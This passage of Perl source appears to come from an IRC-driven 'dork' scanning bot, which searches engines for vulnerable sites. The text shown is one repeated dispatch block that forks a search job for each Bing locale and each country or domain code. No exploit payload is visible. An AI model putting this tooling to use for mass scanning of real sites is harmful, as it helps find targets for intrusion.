&type($chan,$bug,$dork,"BingDK",$type,$nick); } exit; } } if ($engine =~ /bingSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingSE",$type,$nick); } exit; } } if ($engine =~ /bingCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCH",$type,$nick); } exit; } } if ($engine =~ /bingNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNZ",$type,$nick); } exit; } } if ($engine =~ /bingRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingRU",$type,$nick); } exit; } } if ($engine =~ /bingJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingJP",$type,$nick); } exit; } } if ($engine =~ /bingCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCN",$type,$nick); } exit; } } if ($engine =~ /bingKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingKR",$type,$nick); } exit; } } if ($engine =~ /bingMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMX",$type,$nick); } exit; } } if ($engine =~ /bingAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAR",$type,$nick); } exit; } } if ($engine =~ /bingCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCL",$type,$nick); } exit; } } if ($engine =~ /bingAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAU",$type,$nick); } exit; } } if ($engine =~ /ae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AE",$type,$nick); } exit; } } if ($engine =~ /ar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AR",$type,$nick); } exit; } } if ($engine =~ /at/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AT",$type,$nick); } exit; } } if ($engine =~ /au/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AU",$type,$nick); } exit; } } if ($engine =~ /br/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BR",$type,$nick); } exit; } } if ($engine =~ /ca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CA",$type,$nick); } exit; } } if ($engine =~ /cl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CL",$type,$nick); } exit; } } if ($engine =~ /cn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CN",$type,$nick); } exit; } } if ($engine =~ /com/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CoM",$type,$nick); } exit; } } if ($engine =~ /cz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CZ",$type,$nick); } exit; } } if ($engine =~ /de/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DE",$type,$nick); } exit; } } if ($engine =~ /dk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DK",$type,$nick); } exit; } } if ($engine =~ /es/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ES",$type,$nick); } exit; } } if ($engine =~ /eu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EU",$type,$nick); } exit; } } if ($engine =~ /fr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FR",$type,$nick); } exit; } } if ($engine =~ /hu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HU",$type,$nick); } exit; } } if ($engine =~ /id/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ID",$type,$nick); } exit; } } if ($engine =~ /il/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IL",$type,$nick); } exit; } } if ($engine =~ /in/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IN",$type,$nick); } exit; } } if ($engine =~ /info/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"InfO",$type,$nick); } exit; } } if ($engine =~ /ir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IR",$type,$nick); } exit; } } if ($engine =~ /it/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IT",$type,$nick); } exit; } } if ($engine =~ /jp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JP",$type,$nick); } exit; } } if ($engine =~ /kr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KR",$type,$nick); } exit; } } if ($engine =~ /mx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MX",$type,$nick); } exit; } } if ($engine =~ /my/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MY",$type,$nick); } exit; } } if ($engine =~ /net/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NeT",$type,$nick); } exit; } } if ($engine =~ /nl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NL",$type,$nick); } exit; } } if ($engine =~ /org/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"OrG",$type,$nick); } exit; } } if ($engine =~ /ph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PH",$type,$nick); } exit; } } if ($engine =~ /pl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PL",$type,$nick); } exit; } } if ($engine =~ /ro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RO",$type,$nick); } exit; } } if ($engine =~ /ru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RU",$type,$nick); } exit; } } if ($engine =~ /th/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TH",$type,$nick); } exit; } } if ($engine =~ /ua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UA",$type,$nick); } exit; } } if ($engine =~ /uk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UK",$type,$nick); } exit; } } if ($engine =~ /us/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"US",$type,$nick); } exit; } } if ($engine =~ /si/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SI",$type,$nick); } exit; } } if ($engine =~ /be/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BE",$type,$nick); } exit; } } if ($engine =~ /biz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BIZ",$type,$nick); } exit; } } if ($engine =~ /xxx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"XXX",$type,$nick); } exit; } } if ($engine =~ /tel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TEL",$type,$nick); } exit; } } if ($engine =~ /tv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TV",$type,$nick); } exit; } } if ($engine =~ /cc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CC",$type,$nick); } exit; } } if ($engine =~ /mil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MIL",$type,$nick); } exit; } } if ($engine =~ /asia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ASIA",$type,$nick); } exit; } } if ($engine =~ /name/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NAME",$type,$nick); } exit; } } if ($engine =~ /pro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PRO",$type,$nick); } exit; } } if ($engine =~ /travel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TRAVEL",$type,$nick); } exit; } } if ($engine =~ /cat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CAT",$type,$nick); } exit; } } if ($engine =~ /jobs/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JOBS",$type,$nick); } exit; } } if ($engine =~ /mobi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MOBI",$type,$nick); } exit; } } if ($engine =~ /aero/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AERO",$type,$nick); } exit; } } if ($engine =~ /coop/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"COOP",$type,$nick); } exit; } } if ($engine =~ /edu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EDU",$type,$nick); } exit; } } if ($engine =~ /gov/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GOV",$type,$nick); } exit; } } if ($engine =~ /as/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AS",$type,$nick); } exit; } } if ($engine =~ /ai/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AI",$type,$nick); } exit; } } if ($engine =~ /ag/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AG",$type,$nick); } exit; } } if ($engine =~ /az/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AZ",$type,$nick); } exit; } } if ($engine =~ /bh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BH",$type,$nick); } exit; } } if ($engine =~ /bd/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BD",$type,$nick); } exit; } } if ($engine =~ /bz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BZ",$type,$nick); } exit; } } if ($engine =~ /bo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BO",$type,$nick); } exit; } } if ($engine =~ /ba/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BA",$type,$nick); } exit; } } if ($engine =~ /bw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BW",$type,$nick); } exit; } } if ($engine =~ /vg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VG",$type,$nick); } exit; } } if ($engine =~ /bg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BG",$type,$nick); } exit; } } if ($engine =~ /bi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BI",$type,$nick); } exit; } } if ($engine =~ /co/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CO",$type,$nick); } exit; } } if ($engine =~ /cd/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CD",$type,$nick); } exit; } } if ($engine =~ /cg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CG",$type,$nick); } exit; } } if ($engine =~ /ck/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CK",$type,$nick); } exit; } } if ($engine =~ /cr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CR",$type,$nick); } exit; } } if ($engine =~ /hr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HR",$type,$nick); } exit; } } if ($engine =~ /cu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CU",$type,$nick); } exit; } } if ($engine =~ /ci/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CI",$type,$nick); } exit; } } if ($engine =~ /dj/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DJ",$type,$nick); } exit; } } if ($engine =~ /dm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DM",$type,$nick); } exit; } } if ($engine =~ /do/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DO",$type,$nick); } exit; } } if ($engine =~ /ec/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EC",$type,$nick); } exit; } } if ($engine =~ /eg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EG",$type,$nick); } exit; } } if ($engine =~ /sv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SV",$type,$nick); } exit; } } if ($engine =~ /ee/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EE",$type,$nick); } exit; } } if ($engine =~ /et/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ET",$type,$nick); } exit; } } if ($engine =~ /fj/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FJ",$type,$nick); } exit; } } if ($engine =~ /fi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FI",$type,$nick); } exit; } } if ($engine =~ /gm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GM",$type,$nick); } exit; } } if ($engine =~ /gi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GI",$type,$nick); } exit; } } if ($engine =~ /gr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GR",$type,$nick); } exit; } } if ($engine =~ /gl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GL",$type,$nick); } exit; } } if ($engine =~ /gt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GT",$type,$nick); } exit; } } if ($engine =~ /gg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GG",$type,$nick); } exit; } } if ($engine =~ /ht/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HT",$type,$nick); } exit; } } if ($engine =~ /hn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HN",$type,$nick); } exit; } } if ($engine =~ /hk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HK",$type,$nick); } exit; } } if ($engine =~ /is/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IS",$type,$nick); } exit; } } if ($engine =~ /ie/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IE",$type,$nick); } exit; } } if ($engine =~ /im/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IM",$type,$nick); } exit; } } if ($engine =~ /je/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JE",$type,$nick); } exit; } } if ($engine =~ /jo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JO",$type,$nick); } exit; } } if ($engine =~ /kz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KZ",$type,$nick); } exit; } } if ($engine =~ /ke/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KE",$type,$nick); } exit; } } if ($engine =~ /kg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KG",$type,$nick); } exit; } } if ($engine =~ /lv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LV",$type,$nick); } exit; } } if ($engine =~ /ls/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LS",$type,$nick); } exit; } } if ($engine =~ /ly/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LY",$type,$nick); } exit; } } if ($engine =~ /li/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LI",$type,$nick); } exit; } } if ($engine =~ /lt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LT",$type,$nick); } exit; } } if ($engine =~ /lu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LU",$type,$nick); } exit; } } if ($engine =~ /mw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MW",$type,$nick); } exit; } } if ($engine =~ /mt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MT",$type,$nick); } exit; } } if ($engine =~ /mu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MU",$type,$nick); } exit; } } if ($engine =~ /fm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FM",$type,$nick); } exit; } } if ($engine =~ /mn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MN",$type,$nick); } exit; } } if ($engine =~ /ms/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MS",$type,$nick); } exit; } } if ($engine =~ /ma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MA",$type,$nick); } exit; } } if ($engine =~ /na/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NA",$type,$nick); } exit; } } if ($engine =~ /np/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NP",$type,$nick); } exit; } } if ($engine =~ /nz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NZ",$type,$nick); } exit; } } if ($engine =~ /ni/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NI",$type,$nick); } exit; } } if ($engine =~ /nf/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NF",$type,$nick); } exit; } } if ($engine =~ /no/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NO",$type,$nick); } exit; } } if ($engine =~ /om/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"OM",$type,$nick); } exit; } } if ($engine =~ /pk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PK",$type,$nick); } exit; } } if ($engine =~ /pa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PA",$type,$nick); } exit; } } if ($engine =~ /py/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PY",$type,$nick); } exit; } } if ($engine =~ /pe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PE",$type,$nick); } exit; } } if ($engine =~ /pn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PN",$type,$nick); } exit; } } if ($engine =~ /pt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PT",$type,$nick); } exit; } } if ($engine =~ /pr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PR",$type,$nick); } exit; } } if ($engine =~ /qa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"QA",$type,$nick); } exit; } } if ($engine =~ /rw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RW",$type,$nick); } exit; } } if ($engine =~ /sh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SH",$type,$nick); } exit; } } if ($engine =~ /sm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SM",$type,$nick); } exit; } } if ($engine =~ /sa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SA",$type,$nick); } exit; } } if ($engine =~ /sn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SN",$type,$nick); } exit; } } if ($engine =~ /sc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SC",$type,$nick); } exit; } } if ($engine =~ /sg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SG",$type,$nick); } exit; } } if ($engine =~ /sk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SK",$type,$nick); } exit; } } if ($engine =~ /za/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ZA",$type,$nick); } exit; } } if ($engine =~ /lk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LK",$type,$nick); } exit; } } if ($engine =~ /vc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VC",$type,$nick); } exit; } } if ($engine =~ /se/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SE",$type,$nick); } exit; } } if ($engine =~ /ch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CH",$type,$nick); } exit; } } if ($engine =~ /tw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TW",$type,$nick); } exit; } } if ($engine =~ /tj/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TJ",$type,$nick); } exit; } } if ($engine =~ /bs/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BS",$type,$nick); } exit; } } if ($engine =~ /to/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TO",$type,$nick); } exit; } } if ($engine =~ /tt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TT",$type,$nick); } exit; } } if ($engine =~ /tr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TR",$type,$nick); } exit; } } if ($engine =~ /tm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TM",$type,$nick); } exit; } } if ($engine =~ /vi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VI",$type,$nick); } exit; } } if ($engine =~ /ug/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UG",$type,$nick); } exit; } } if ($engine =~ /uy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UY",$type,$nick); } exit; } } if ($engine =~ /uz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UZ",$type,$nick); } exit; } } if ($engine =~ /ve/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VE",$type,$nick); } exit; } } if ($engine =~ /vn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VN",$type,$nick); } exit; } } if ($engine =~ /zm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ZM",$type,$nick); } exit; } } if ($engine =~ /museum/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MUSEUM",$type,$nick); } exit; } } if ($engine =~ /ws/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WS",$type,$nick); } exit; } } if ($engine =~ /af/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AF",$type,$nick); } exit; } } if ($engine =~ /ax/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AX",$type,$nick); } exit; } } if ($engine =~ /al/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AL",$type,$nick); } exit; } } if ($engine =~ /dz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DZ",$type,$nick); } exit; } } if ($engine =~ /ao/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AO",$type,$nick); } exit; } } if ($engine =~ /aq/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AQ",$type,$nick); } exit; } } if ($engine =~ /am/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AM",$type,$nick); } exit; } } if ($engine =~ /aw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 